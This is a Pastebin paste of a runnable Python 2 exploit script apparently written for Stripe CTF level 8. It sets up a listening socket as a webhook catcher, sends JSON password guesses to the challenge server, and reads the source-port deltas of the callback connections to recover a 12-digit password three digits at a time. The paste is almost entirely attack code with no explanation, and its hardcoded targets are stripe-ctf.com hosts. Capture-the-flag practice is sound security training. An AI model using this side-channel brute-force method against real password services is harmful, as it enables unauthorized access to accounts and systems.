Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import socket
- import urllib2
- import json
- import sys
- import thread
- import time
- from collections import deque
- run = 1
- def start(hookaddr, hookport, target):
- template = ""
- notaim = 2#4
- s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- s.bind(('0.0.0.0', hookport))
- s.listen(1)
- args = "".zfill(12),target,hookaddr + ":" + str(hookport)
- thread.start_new_thread(requester, args)
- lastport = catchRequest(s)
- print "[~] first port: " + str(lastport)
- list = deque([0])
- for a in range(0,100):
- list.append(a)
- while len(list):
- chunk = list.popleft()
- args = str(chunk).zfill(3) + ("0" * 9) ,target,hookaddr + ":" + str(hookport)
- thread.start_new_thread(requester, args)
- port = catchRequest(s)
- delta = port - lastport
- lastport = port
- print str(chunk) + "\t\t" + str(delta) + "\t\t" + str((((1000 - len(list)) / 1000.0) * 100)) + "%"
- if delta != notaim:
- list.append(chunk)
- print "FAILED"
- global run
- run = 0
- def catchRequest(socket):
- conn, addr = socket.accept()
- port = addr[1]
- conn.close()
- return port
- def requester(guess, address, webhook):
- jdata = json.dumps({"password":guess, "webhooks":[webhook]})
- f = urllib2.urlopen(address, jdata)
- if "true" in f.read(100):
- print "[~] Password found:"
- print guess
- print "Ignore values part this point:"
- global run
- run = 0
- else:
- sys.exit(0)
- if __name__ == '__main__':
- port = 5329
- print "[*] Starting on " + str(port)
- #args = "127.0.0.1", port, "http://127.0.0.1:3000"
- args = "level02-2.stripe-ctf.com", port, "https://level08-4.stripe-ctf.com/user-xxxxxxxxxx/"
- thread.start_new_thread(start, args)
- while run:
- time.sleep(0.1)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
